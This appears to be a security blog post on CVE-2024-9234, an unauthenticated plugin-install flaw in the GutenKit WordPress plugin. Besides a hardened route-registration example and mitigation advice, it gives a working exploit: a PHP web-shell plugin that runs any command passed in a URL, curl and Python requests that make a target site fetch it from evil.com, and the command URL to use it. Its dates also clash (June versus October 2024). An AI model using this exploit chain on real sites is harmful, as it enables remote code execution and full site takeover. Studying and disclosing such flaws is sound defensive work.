Published: June, 2024

Introduction

A major security flaw has been found in the popular GutenKit WordPress plugin, officially tracked as CVE-2024-9234. If your website uses the *GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor* plugin at version 2.1. or earlier, your site may be at serious risk.

This long-form post explains the vulnerability in simple language, demonstrates how attackers can exploit it, and provides direct references for further reading. We'll also show you simple proof-of-concept code.

What Is the Vulnerability?

The GutenKit plugin adds powerful page-building features to the Gutenberg editor. However, a critical issue was discovered in the plugin's REST API endpoint, specifically in the install_and_activate_plugin_from_external() function (tied to the install-active-plugin REST route).

Problem:

This function performs no capability check, so anyone, including unauthenticated visitors, can call this endpoint to:

- Have the site download and install a plugin ZIP from a URL they supply.
- Instantly activate that upload on your website.

This opens the door for severe attacks, including full site takeover.

Here's a simplified version of the problematic function:

// Inside GutenKit plugin
function install_and_activate_plugin_from_external($request) {
    $plugin_url = $request->get_param('plugin_url');
    // Download plugin zip, extract, install, and activate plugin
    // NO check for user permissions or authentication!
}

The endpoint is publicly accessible:

POST /wp-json/gutenkit/v1/install-active-plugin

It takes one parameter, plugin_url, which should point to a ZIP file. The plugin downloads, unzips, installs, and activates whatever is supplied, no questions asked.
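The fix for this class of bug is an authorization gate on the route itself, not on the page that calls it. Below is an added example written for this post, not GutenKit's own code or its vendor patch; it assumes the route is registered with register_rest_route(), that the unsafe form had a missing or '__return_true' permission_callback, and that downloads.wordpress.org is an acceptable allowlisted download host:

```php
<?php
// Added illustration, not GutenKit's source. The route name and the
// plugin_url parameter come from the advisory; everything else is assumed.

add_action( 'rest_api_init', function () {
    register_rest_route( 'gutenkit/v1', '/install-active-plugin', array(
        'methods'  => 'POST',
        'callback' => 'install_and_activate_plugin_from_external',

        // Vulnerable form (assumed): no permission_callback at all, or
        //     'permission_callback' => '__return_true',
        // which lets any visitor reach the handler.
        //
        // Hardened form: the REST cookie authentication only establishes a
        // user context when a valid X-WP-Nonce accompanies the request, so
        // anonymous calls never satisfy these capability checks.
        'permission_callback' => function () {
            return current_user_can( 'install_plugins' )
                && current_user_can( 'activate_plugins' );
        },

        // Even for authorized users, constrain where a plugin may be fetched
        // from; a free-form URL is a remote code inclusion primitive.
        'args' => array(
            'plugin_url' => array(
                'required'          => true,
                'type'              => 'string',
                'sanitize_callback' => 'esc_url_raw',
                'validate_callback' => function ( $value ) {
                    $allowed_hosts = array( 'downloads.wordpress.org' ); // assumed allowlist
                    $scheme = wp_parse_url( $value, PHP_URL_SCHEME );
                    $host   = wp_parse_url( $value, PHP_URL_HOST );
                    return false !== wp_http_validate_url( $value )
                        && 'https' === $scheme
                        && in_array( $host, $allowed_hosts, true );
                },
            ),
        ),
    ) );
} );
```

With this registration, WordPress returns a 401/403 rest_forbidden response before the download handler runs, and a request that passes the capability check is still refused unless plugin_url is an https URL on the allowlist.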

Step 1: Prepare a Malicious Plugin

Make a simple PHP backdoor, zip it, and host it online.

malicious-plugin.php

<?php
// Plugin header
/*
Plugin Name: Malicious Plugin
*/
if (isset($_GET['cmd'])) {
  system($_GET['cmd']);
}
?>

Zip this as malicious-plugin.zip and upload to a file hosting service.

On your target site (using curl, Python, or Postman):

curl -X POST "https://victim.com/wp-json/gutenkit/v1/install-active-plugin" \
     -d 'plugin_url=https://evil.com/malicious-plugin.zip'

Or, in Python:

import requests

url = "https://victim.com/wp-json/gutenkit/v1/install-active-plugin"
data = {"plugin_url": "https://evil.com/malicious-plugin.zip"}
resp = requests.post(url, data=data)
print(resp.text)

Now the malicious plugin is active! Access:

https://victim.com/wp-content/plugins/malicious-plugin/malicious-plugin.php?cmd=whoami

Mitigation

1. Update Immediately: Upgrade to the latest patched version of GutenKit.
2. Disable the REST API Endpoint (if possible): Use security plugins to block access to this endpoint.
3. Scan for Unknown Plugins: Check your /wp-content/plugins folder for suspicious files.

Official References

- Original Vulnerability Disclosure on WPScan (Link may be placeholder—keep checking for updates)
- Plugin page on WordPress.org
- Wordfence Threat Advisory

Conclusion

CVE-2024-9234 is a severe, trivial-to-exploit vulnerability affecting tens of thousands of WordPress sites. Unauthenticated attackers can upload and activate arbitrary code remotely, potentially gaining full control of vulnerable sites.

Act now:
Update your GutenKit plugin, monitor plugin installs, and keep your WordPress core and plugins up to date. If you're a security professional, check the sites under your management immediately!

Stay safe online.

*For detailed advisory and official patch releases, keep an eye on: WPScan and the plugin changelog.*


*Do NOT use this information for unauthorized testing. This guide is for educational and defensive purposes only.*

Timeline

Published on: 10/11/2024 13:15:18 UTC
Last modified on: 10/15/2024 12:58:51 UTC